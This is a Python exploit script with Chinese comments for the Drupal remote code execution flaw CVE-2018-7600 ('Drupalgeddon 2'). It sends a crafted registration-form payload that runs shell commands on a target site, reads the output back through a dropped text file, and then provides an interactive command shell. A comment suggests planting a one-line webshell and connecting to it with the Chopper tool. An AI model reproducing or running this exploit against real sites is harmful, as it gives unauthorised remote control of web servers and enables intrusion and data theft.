#!/usr/bin/env python3
# coding:utf-8
# Drupal 漏洞检测交互脚本
# author：ske
# usage: python3 CVE-2018-7600_shell.py http://xxx.xxx.xxx.xxx
# 好像有个bug，利用检测脚本是时候，输入的url末尾不要带有/， 比如[X] "http://xxx.xxx.xxx.xxx/"
# 有些命令执行有点问题，所以建议先echo一个一句话进去，然后用菜刀连接
import requests
import sys

target = sys.argv[1]
try:
    commands = 'echo "test:)" | tee index1.txt'   # index1.txt文件
    url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
    payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': '{}'.format(commands)}
    requests.post(url=url, data=payload, timeout=5)

    index1_url = target + '/index1.txt'
    res = requests.get(url=index1_url, timeout=5)
    if 'test:)' in res.text and res.status_code == 200:
        print('[+] [{}] 存在Drupal geddon 2 远程代码执行漏洞(CVE-2018-7600)'.format(target))
        commands = 'rm index1.txt'
        payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec',
                   'mail[#type]': 'markup', 'mail[#markup]': '{}'.format(commands)}
        requests.post(url, data=payload, timeout=5)
        print('[+] [{}] 删除测试文件index1.txt'.format(target))

        while True:
            commands = input('>>>')
            if commands == 'q':
                sys.exit('quit!')
            else:
                payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec',
                           'mail[#type]': 'markup', 'mail[#markup]': '{} | tee index1.txt'.format(commands)}
                requests.post(url, data=payload, timeout=5)
                index1_url = target + '/index1.txt'
                html_text = requests.get(url=index1_url, timeout=5).text
                print(html_text)
                payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec',
                           'mail[#type]': 'markup', 'mail[#markup]': 'rm index1.txt'}
                requests.post(url, data=payload, timeout=5)
                print('[+] [{}] 成功删除测试文件index1.txt'.format(target))
                print('-'*50)
    else:
        print('[-] [{}] 不存在Drupal geddon 2 远程代码执行漏洞(CVE-2018-7600)'.format(target))
except Exception as e:
    sys.exit(e.args)


